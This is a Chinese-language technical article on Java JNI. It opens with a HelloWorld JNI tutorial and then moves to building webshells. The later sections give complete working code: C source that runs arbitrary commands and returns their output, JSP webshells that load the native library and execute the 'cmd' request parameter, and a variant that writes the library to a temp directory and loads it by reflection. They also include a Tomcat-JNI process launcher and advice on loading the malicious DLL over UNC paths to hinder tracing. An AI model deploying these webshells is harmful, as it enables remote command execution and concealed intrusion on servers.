Java JNI(Java Native Interface)攻击原理研究
一、Java JNI简介
0x1:JNI是什么
JNI (Java Native Interface,Java本地接口)是一种编程框架,使得Java虚拟机中的Java程序可以调用本地应用/或库,也可以被其他程序调用。 本地程序一般是用其它语言(C、C++或汇编语言等)编写的,并且被编译为基于本机硬件和操作系统的程序。
0x2:为什么需要JNI
- Java标准库不支持的平台相关功能或者程序库,当然,也有各种高性能的程序,以及平台相关的API实现,允许所有Java应用程序安全并且平台独立地使用这些功能。
- 平台相关的功能,通常是为了追求性能,需要对Java虚拟机进行扩展,需要使用Native的实现。
- Java的.class文件安全性较差,增加安全性,将重要的逻辑在Native代码中实现。
二、编写一个HelloWorld JNI程序
0x1:需求
在Java中调用Native方法,Native方法输出Hello JNI。
0x2:开发过程
调用JNI接口的步骤:
- 编写Java代码,注明要访问的本地动态连接库和本地方法
- 编译Java代码得到.class文件
- 使用javah生成该类对应的.h文件
- 使用C++实现函数功能,编译生成dll
- 通过Java调用dll
1、准备Java侧代码
package org.example; public class HelloWorld { static { System.loadLibrary("hello"); } public native void sayHello(); public static void main(String[] args) { new HelloWorld().sayHello(); } }
首先,定义了一个Hello类。
接下来,其中的static代码块是JVM在加载类时执行的,System.loadLibrary()表明需要加载动态库hello,在不同的系统平台上对应不同的名字,
- 在Windows平台上查找的是hello.dll
- 在Linux平台上查找的是libhello.so
- 在MacOS平台上查找的是libhello.dylib
这个库应该被放在Java库的搜索路径中,可以通过-Djava.library.path=/path/to/lib将其加入到搜索路径中。如果路径下没有找到要导入的库,会在抛出UnsatisfiedLinkError错误。
然后,声明了sayHello的native方法,通过native关键字来表明这个方法的实现不在Java中。它的实现应该在hello库中。
最后是我们的测试程序主入口,调用native方法sayHello()。
2、生成头文件
首先,编译Java程序,生成HelloWorld.class。
打开idea的Terminal窗口输入:
javah -d ./jni -cp target/classes org.example.HelloWorld
就在当前项目下新建了一个jni文件夹,生成了对应的.h头文件。
包含的头文件jni.h,它是JDK提供的,位于<JAVA_HOME>/include目录中,具体的路径和平台相关:
- <JAVA_HOME>/include/win32
- <JAVA_HOME>/include/linux
- <JAVA_HOME>/include/darwin
这个头文件声明根据Java中的声明的native方法,生成了一个C函数的声明Java_org_example_HelloWorld_sayHello:
/* * Class: org_example_HelloWorld * Method: sayHello * Signature: ()V */ JNIEXPORT void JNICALL Java_org_example_HelloWorld_sayHello (JNIEnv *, jobject);
Java中的native方法到C函数的命名规则为:
Java_{package_and_classname}_{function_name}();
所有方法以Java_开头,接着是包名和类名,以_替换.,最后是方法名。
在Java中sayHello是没有参数的方法,但是在生成的C函数声明中有两个参数,它们是每个方法都会传递的参数,分别为:
- JNIEnv*,指向JNI环境的指针,通过它可以使用JNI协议提供的接口(函数)
- jobject,指向this的指针,用于获取类相关的信息(变量、方法等)
对于JNIEXPORT和JNICALL两个宏,用于设置函数可见性,以及调用栈约定,这里可以忽略这两个宏。
3、实现native方法
在jni目录下新建hello.c文件,实现函数Java_org_example_HelloWorld_sayHello(),
#include "org_example_HelloWorld.h" #include <jni.h> #include <stdio.h> JNIEXPORT void JNICALL Java_org_example_HelloWorld_sayHello (JNIEnv *env, jobject obj) { printf("Hello JNI!\n"); }
4、编译.c文件
gcc -shared -I/Library/Java/JavaVirtualMachines/jdk1.8.0_291.jdk/Contents/Home/include -I/Library/Java/JavaVirtualMachines/jdk1.8.0_291.jdk/Contents/Home/include/darwin hello.c -o libhello.dylib gcc -shared -I$JAVA_HOME/include -I$JAVA_HOME/include/darwin hello.c -o libhello.dylib
编译生成.dylib库文件。
5、运行Java程序
java -Djava.library.path=/Users/zhenghan/Projects/JNI_test/jni/ org.example.HelloWorld
6、使用C++实现
相比较于C的实现,C++区别不大,将实现的文件由Hello.c命名为Hello.cc,内容为:
#include "org_example_HelloWorld.h" #include <jni.h> #include <iostream> JNIEXPORT void JNICALL Java_org_example_HelloWorld_sayHello (JNIEnv *env, jobject obj) { std::cout << "Hello JNI from C++!" << std::endl; }
编译:
g++ -shared -I/Library/Java/JavaVirtualMachines/jdk1.8.0_291.jdk/Contents/Home/include -I/Library/Java/JavaVirtualMachines/jdk1.8.0_291.jdk/Contents/Home/include/darwin hello.cc -o libhello.dylib
其他步骤与C的实现一致。
参考链接:
https://blog.csdn.net/pengmaoming/article/details/80167295 https://blog.csdn.net/furzoom/article/details/113730538 https://blog.csdn.net/createchance/article/details/53783490
三、基于Java JNI实现Webshell
假设我们要实现的jsp webshell名为:test.jsp。
由于jni技术需要先通过javah将.class文件生成.h开头的.c头文件,又因为jsp是一种特殊的class文件,jsp经过Tomcat编译为class文件,命名遵从:
test.jsp ->> org.apache.jsp.test_jsp.class
所以我们需要新建package为org.apache.jsp,类名为test_jsp的.java文件。
package org.apache.jsp; public class test_jsp { class JniClass { public native String exec( String string ); } }
Tomcat环境下,需要遵循以下限制条件:
- 固定包名格式为org.apache.jsp
- java文件名称需要固定格式:***_jsp,并且后面的jsp文件名称需要同其保持一致。例如tes_jsp.java,那么最终jsp的文件名称需要命名为test.jsp
- 类名不需要限定为JniClass,可以任意
编译Java代码得到.class文件,生成test_jsp.class、test_jsp$JniClass.class,
使用javah指令生成.h文件,打开idea的Terminal窗口输入:
javah -d ./jni -cp target/classes org.apache.jsp.test_jsp$JniClass
生成org_apache_jsp_test_jsp_JniClass.h文件,
/* DO NOT EDIT THIS FILE - it is machine generated */ #include <jni.h> /* Header for class org_apache_jsp_test_jsp_JniClass */ #ifndef _Included_org_apache_jsp_test_jsp_JniClass #define _Included_org_apache_jsp_test_jsp_JniClass #ifdef __cplusplus extern "C" { #endif /* * Class: org_apache_jsp_test_jsp_JniClass * Method: exec * Signature: (Ljava/lang/String;)Ljava/lang/String; */ JNIEXPORT jstring JNICALL Java_org_apache_jsp_test_1jsp_00024JniClass_exec (JNIEnv *, jobject, jstring); #ifdef __cplusplus } #endif #endif
编写包含指令执行回显的C代码,并引入上一步生成的.h文件,
#include "org_apache_jsp_test_jsp_JniClass.h" #include <jni.h> #include <string.h> #include <stdio.h> #include <sys/types.h> #include <unistd.h> #include <stdlib.h> int execmd(const char *cmd, char *result) { char buffer[1024*12]; //定义缓冲区 FILE *pipe = popen(cmd, "r"); //打开管道,并执行命令 if (!pipe) return 0; //返回0表示运行失败 while (!feof(pipe)) { if (fgets(buffer, 128, pipe)) { //将管道输出到result中 strcat(result, buffer); } } pclose(pipe); //关闭管道 return 1; //返回1表示运行成功 } JNIEXPORT jstring JNICALL Java_org_apache_jsp_test_1jsp_00024JniClass_exec(JNIEnv *env, jobject class_object, jstring jstr) { const char *cstr = (*env)->GetStringUTFChars(env, jstr, NULL); char result[1024 * 12] = ""; //定义存放结果的字符串数组 if (1 == execmd(cstr, result)) { //printf(result); } char return_messge[100] = ""; strcat(return_messge, result); jstring cmdresult = (*env)->NewStringUTF(env, return_messge); //system(); return cmdresult; }
使用gcc将该c源码编译为dll、so或者lib(注意jdk版本要与目标机器的jdk保持一致),
gcc -shared -I/Library/Java/JavaVirtualMachines/jdk1.8.0_291.jdk/Contents/Home/include -I/Library/Java/JavaVirtualMachines/jdk1.8.0_291.jdk/Contents/Home/include/darwin jsp_exec_jni.c -o libexec.dylib
接下来,具体在jsp load时有两种思路,
- 一种是将该jsp文件和该dll放置于服务器的本地路径,jsp的代码里指定dll的绝对路径\相对路径
- 一种是使用unc路径,这样恶意dll通过远程部署,加强隐蔽程度,加大溯源难度、提高部署灵活度
<%! class JniClass { public native String exec(String string); public JniClass() { System.load("/Users/zhenghan/Projects/JNI_test/jni/libexec.dylib"); } } %> <% String cmd = request.getParameter("cmd"); if (cmd != null) { JniClass a = new JniClass(); String res = a.exec(cmd); out.println(res); } else{ response.sendError(404); } %>
有几个注意点:
- jsp文件名称需要同之前的java文件保持一致。
- 对于linux|mac环境,上一步生成的java内部类叫做JniClass,在类unix平台下,加载的库名需要为lib开头+JniClass+jnilib或者dylib。
- jni载荷的c、c++实现的代码要具备健壮性,避免目标环境的jvm奔溃。
还有另外一种jsp利用思路,就是将jni库代码写在jsp代码中,然后通过jsp动态写入磁盘上,并在jsp中通过system.load动态加载jni库文件,
<%@ page contentType="text/html;charset=UTF-8" language="java" %> <%@ page import="java.io.File" %> <%@ page import="java.io.FileOutputStream" %> <%@ page import="java.io.IOException" %> <%@ page import="java.lang.reflect.Method" %> <%-- load_library_cmd_all.jsp?cmd=ls --%> <%-- 通过JNI的方式调用动态链接库, 反射调用 ClassLoader 的 loadLibrary0 方法进行加载 --%> <%! private static final String COMMAND_CLASS_NAME = "com.anbai.sec.cmd.CommandExecution"; /** * JDK1.5编译的com.anbai.sec.cmd.CommandExecution类字节码, * 只有一个public static native String exec(String cmd);的方法 */ private static final byte[] COMMAND_CLASS_BYTES = new byte[]{ -54, -2, -70, -66, 0, 0, 0, 49, 0, 15, 10, 0, 3, 0, 12, 7, 0, 13, 7, 0, 14, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 4, 101, 120, 101, 99, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 21, 67, 111, 109, 109, 97, 110, 100, 69, 120, 101, 99, 117, 116, 105, 111, 110, 46, 106, 97, 118, 97, 12, 0, 4, 0, 5, 1, 0, 34, 99, 111, 109, 47, 97, 110, 98, 97, 105, 47, 115, 101, 99, 47, 99, 109, 100, 47, 67, 111, 109, 109, 97, 110, 100, 69, 120, 101, 99, 117, 116, 105, 111, 110, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 0, 33, 0, 2, 0, 3, 0, 0, 0, 0, 0, 2, 0, 1, 0, 4, 0, 5, 0, 1, 0, 6, 0, 0, 0, 29, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 1, 0, 7, 0, 0, 0, 6, 0, 1, 0, 0, 0, 7, 1, 9, 0, 8, 0, 9, 0, 0, 0, 1, 0, 10, 0, 0, 0, 2, 0, 11 }; /** * 获取JNI链接库目录 * @return 返回缓存JNI的临时目录 */ File getTempJNILibFile() { File jniDir = new File(System.getProperty("java.io.tmpdir"), "jni-lib"); if (!jniDir.exists()) { jniDir.mkdir(); } String filename; if (isWin()) { filename = "cmd.dll"; } else { if (isMac()) { filename = "libcmd.lib"; } else { filename = "libcmd.so"; } } return new File(jniDir, filename); } boolean isWin() { return (System.getProperty("os.name") != null && System.getProperty("os.name").startsWith("Win")); } boolean isWin32() { return "32".equals(System.getProperty("sun.arch.data.model")); } boolean isMac() { return (System.getProperty("os.name") != null && System.getProperty("os.name").startsWith("Mac")); } /** * 高版本JDKsun.misc.BASE64Decoder已经被移除,低版本JDK又没有java.util.Base64对象, * 所以还不如直接反射自动找这两个类,哪个存在就用那个decode。 * @param str * @return */ byte[] base64Decode(String str) { try { try { Class clazz = Class.forName("sun.misc.BASE64Decoder"); return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str); } catch (ClassNotFoundException e) { Class clazz = Class.forName("java.util.Base64"); Object decoder = clazz.getMethod("getDecoder").invoke(null); return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str); } } catch (Exception e) { return null; } } /** * 写JNI链接库文件 * @param base64 JNI动态库Base64 * @return 返回是否写入成功 */ void writeJNILibFile(String base64) throws IOException { if (base64 != null) { File jniFile = getTempJNILibFile(); if (!jniFile.exists()) { byte[] bytes = base64Decode(base64); if (bytes != null) { FileOutputStream fos = new FileOutputStream(jniFile); fos.write(bytes); fos.flush(); fos.close(); } } } } %> <% String cmd = request.getParameter("cmd"); String jniBytes = request.getParameter("jni"); String COMMAND_JNI_FILE_BYTES; if (isWin()) { if (isWin32()) { // windows 32 COMMAND_JNI_FILE_BYTES = "省略具体的Base64编码信息,请参考javaweb-sec/javaweb-sec-source/javasec-test/javasec-vuls-struts2/src/main/webapp/modules/jni/loadlibrary.jsp"; } else { // windows 64 COMMAND_JNI_FILE_BYTES = "省略具体的Base64编码信息,请参考javaweb-sec/javaweb-sec-source/javasec-test/javasec-vuls-struts2/src/main/webapp/modules/jni/loadlibrary.jsp"; } } else { if (isMac()) { // mac COMMAND_JNI_FILE_BYTES = "省略具体的Base64编码信息,请参考javaweb-sec/javaweb-sec-source/javasec-test/javasec-vuls-struts2/src/main/webapp/modules/jni/loadlibrary.jsp"; } else { // centos 7 64 COMMAND_JNI_FILE_BYTES = "省略具体的Base64编码信息,请参考javaweb-sec/javaweb-sec-source/javasec-test/javasec-vuls-struts2/src/main/webapp/modules/jni/loadlibrary.jsp"; } } // JNI路径 File jniFile = getTempJNILibFile(); ClassLoader loader = (ClassLoader) application.getAttribute("__LOADER__"); if (loader == null) { loader = new ClassLoader(this.getClass().getClassLoader()) { @Override protected Class<?> findClass(String name) throws ClassNotFoundException { try { return super.findClass(name); } catch (ClassNotFoundException e) { return defineClass(COMMAND_CLASS_NAME, COMMAND_CLASS_BYTES, 0, COMMAND_CLASS_BYTES.length); } } }; writeJNILibFile(jniBytes != null ? jniBytes : COMMAND_JNI_FILE_BYTES);// 写JNI文件到临时文件目录 application.setAttribute("__LOADER__", loader); } try { // load命令执行类 Class commandClass = loader.loadClass("com.anbai.sec.cmd.CommandExecution"); Object loadLib = application.getAttribute("__LOAD_LIB__"); if (loadLib == null || !((Boolean) loadLib)) { Method loadLibrary0Method = ClassLoader.class.getDeclaredMethod("loadLibrary0", Class.class, File.class); loadLibrary0Method.setAccessible(true); loadLibrary0Method.invoke(loader, commandClass, jniFile); application.setAttribute("__LOAD_LIB__", true); } String content = (String) commandClass.getMethod("exec", String.class).invoke(null, cmd); out.println("<pre>"); out.println(content); out.println("</pre>"); } catch (Exception e) { out.println(e.toString()); throw e; } %>
参考链接:
https://www.javasec.org/java-vuls/JNI.html https://blog.csdn.net/weixin_47208161/article/details/106527583 https://www.cnblogs.com/interdrp/p/5012185.html https://3gstudent.github.io/Java%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87JNI%E5%8A%A0%E8%BD%BDdll https://raw.githubusercontent.com/javaweb-sec/javaweb-sec/master/javaweb-sec-source/javasec-test/javasec-vuls-struts2/src/main/webapp/modules/jni/loadlibrary.jsp https://zhuanlan.zhihu.com/p/125477850 https://www.javasec.org/java-vuls/JNI.html
四、基于Tomcat-JNI实现Webshell
上一章的攻击方式需要加载.so动态链接库才能进行调用,混次通常要配合目标的文件上传漏洞和代码执行漏洞来调用已经上传的链接库,这种方式大大增加了漏洞利用的成本。而冰蝎作者提出了一种新的思路,通过已经有的tomcat-jni.jar包(在Tomcat环境种默认存在)进行利用。
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@ page import="org.apache.tomcat.jni.*"%> <!DOCTYPE html> <html> <head></head> <body> <% String cmd = request.getParameter("cmd"); try{ Library.initialize(null); long pool = Pool.create(0); long proc = Proc.alloc(pool); Proc.create(proc, "/System/Applications/Calculator.app/Contents/MacOS/Calculator", new String []{}, new String[]{}, Procattr.create(pool), pool); out.print("++yes++"); }catch(Exception e){ e.printStackTrace(); } %> </body> </html>
参考链接:
https://www.cnblogs.com/wh4am1/p/16780056.html